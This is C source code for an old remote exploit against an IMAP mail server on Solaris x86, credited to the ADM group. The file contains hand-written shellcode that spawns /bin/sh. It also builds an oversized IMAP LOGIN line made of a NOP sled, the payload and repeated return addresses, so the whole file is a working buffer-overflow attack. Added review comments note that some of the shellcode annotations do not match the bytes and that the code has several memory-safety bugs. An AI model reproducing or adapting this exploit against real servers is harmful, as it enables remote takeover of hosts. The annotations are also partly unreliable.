
  1. /*      Copyright (c) 2000 ADM                                  */
  2. /*      All Rights Reserved                                     */
  3. /*      THIS IS UNPUBLISHED PROPRIETARY SOURCE CODE OF ADM      */
  4. /*      The copyright notice above does not evidence any        */
  5. /*      actual or intended publication of such source code.     */
  6. /*                                                              */
  7. /*      Title:        ADMsximap.c  (ADM Solaris X86 IMAP .c)    */
  8. /*      Tested under: SIMS 2.0, fixed now                       */
  9. /*      By:           K2                                        */
  10. /*      Discovered by: DiGiT                                    */
  11. /*      Shellcode by: cheez                                     */
  12. /*      GROUP EFFORT*@$()!*$#(&@!*(!$                           */
  13. /*                                                              */
  14.  
  15.  
  16. #include <unistd.h>
  17. #include <stdio.h>
  18. #include <stdlib.h>
  19. #include <string.h>
  20.  
/*
 * Raw payload bytes that main() copies into buffer[] at byte offset `nop`
 * and emits as part of the generated LOGIN line.
 *
 * The per-line offsets and mnemonics are the original author's annotations
 * and are not verified here; at least the single-byte "\xd0"/"\xd3" entries
 * do not decode to the mnemonic written next to them.  The array contains
 * no "\x00", so strlen(shell) in main() covers all 77 bytes.
 */
char shell[] =
  /*  0 */ "\xeb\x2d"                         /* jmp springboard      */
  /* start:                                                           */
  /*  2 */ "\x5e"                             /* popl %esi            */
  /*  3 */ "\x31\xdb"                         /* xor %ebx,%ebx        */
  /*  5 */ "\x88\x5e\x07"                     /* movb %bl,0x7(%esi)   */
  /*  8 */ "\x89\x5e\x0c"                     /* movl %ebx,0xc(%esi)  */
  /* 11 */ "\x89\x5e\x13"                     /* movl %ebx,0x13(%esi) */
  /* 14 */ "\x88\x5e\x18"                     /* movb %bl,0x18(%esi)  */
  /* 17 */ "\xb3\x80"                         /* movb $0x80,%bl       */
  /* 19 */ "\x28\x5e\xed"                     /* subb %bl,-0x13(%esi) */
  /* 22 */ "\x28\x5e\xf1"                     /* subb %bl,-0xf(%esi)  */
  /* 25 */ "\x28\x5e\xf7"                     /* subb %bl,-0x9(%esi)  */
  /* 28 */ "\x28\x5e\xf8"                     /* subb %bl,-0x8(%esi)  */
  /* 31 */ "\x31\xc0"                         /* xor %eax,%eax        */
  /* 33 */ "\xd0"                             /* pushl %eax           */
  /* 34 */ "\x8d\x5e\x08"                     /* leal 0x8(%esi),%ebx  */
  /* 37 */ "\xd3"                             /* pushl %ebx           */
  /* 38 */ "\x8d\x1e"                         /* leal (%esi),%ebx     */
  /* 40 */ "\x89\x5e\x08"                     /* movl %ebx,0x8(%esi)  */
  /* 43 */ "\xd3"                             /* pushl %ebx           */
  /* 44 */ "\xd0"                             /* pushl %eax           */
  /* 45 */ "\xeb\x15"                         /* jmp exec             */
  /* springboard:                                                     */
  /* 47 */ "\xe8\xce\xff\xff\xff"             /* call start           */
  /* data:                                                            */
  /* 52 */ "\x2f\x62\x69\x6e\x2f\x73\x68\xff" /* DATA                 */
  /* 60 */ "\xff\xff\xff\xff"                 /* DATA                 */
  /* 64 */ "\xff\xff\xff\xff"                 /* DATA                 */
  /* execve:                                                          */
  /* 68 */ "\xb0\x3b"                         /* movb $0x3b,%al       */
  /* 70 */ "\x9a\xff\xff\xff\xff\x07\xff";    /* lcall 0x7,0x0        */
  53.  
  54.  
/* Parameters of the line built by main(); the two defaults below may be
 * adjusted from argv[1]/argv[2]. */
enum {
  SIZE   = 1600,   /* total length of buffer[]                      */
  NOPDEF = 631,    /* default byte offset at which shell[] is placed */
  DEFOFF = -111    /* default adjustment added to esp                */
};

const char x86_nop = 0x90;   /* filler byte used for the whole of buffer[] */
long nop    = NOPDEF;        /* where shell[] is copied into buffer[]      */
long esp    = 0x80472a0;     /* esp+offset is stored repeatedly in the tail */
long offset = DEFOFF;
char buffer[SIZE];           /* the output line assembled by main()        */
  63.  
/*
 * Writes one IMAP LOGIN line of SIZE bytes to stdout: buffer[] is filled
 * with x86_nop, shell[] is copied in at byte offset `nop`, and the rest is
 * filled with the 4-byte value esp+offset.  A one-line summary goes to
 * stderr.
 *
 * argv[1]: number parsed with strtol (base 0: decimal, 0x..., 0...), added
 *          to `offset`.
 * argv[2]: number parsed with strtoul (base 0), added to `nop`.
 * Returns 0 unconditionally.
 *
 * Review notes (left as-is):
 *  - neither argument is range-checked: nop >= SIZE, or a value that wraps
 *    `nop` negative, makes the memcpy and the tail loop write outside
 *    buffer[].
 *  - the tail loop stores an int through a cast char pointer at every 4th
 *    index from nop+strlen(shell): an unaligned, aliasing-violating store,
 *    and when SIZE - i < 4 the last store runs past the end of buffer[].
 *  - buffer[] is never NUL-terminated; with the defaults esp+offset is
 *    0x8047231, whose bytes are all non-zero, so strlen(buffer) and "%s"
 *    read past the end of the array.
 *  - "%x" receives a long and "%d" a size_t (format/argument mismatch).
 */
int main (int argc, char *argv[])
{
  int i;

  /* Optional tuning from the command line; no bounds checks are applied. */
  if (argc > 1) offset += strtol(argv[1], NULL, 0);
  if (argc > 2) nop += strtoul(argv[2], NULL, 0);

  memset(buffer, x86_nop, SIZE);                 /* whole buffer = filler */
  memcpy(buffer+nop, shell, strlen(shell));      /* payload at offset nop */
  /* Fill the remainder with esp+offset, 4 bytes at a time (see notes). */
  for (i = (nop+strlen(shell)); i < SIZE; i += 4)
    {
      *((int *) &buffer[i]) = esp+offset;
    }

  /* Summary to stderr; strlen(buffer) relies on a terminator that is
   * not guaranteed to exist (see notes). */
  fprintf(stderr,"offset = 0x%x\tstrlen %d\n",esp+offset,strlen(buffer));
  printf("604 LOGIN \"%s\" pass\r\n", buffer);

  return 0;
}
  83. /*                    www.hack.co.za                  [23 Feb 2000]*/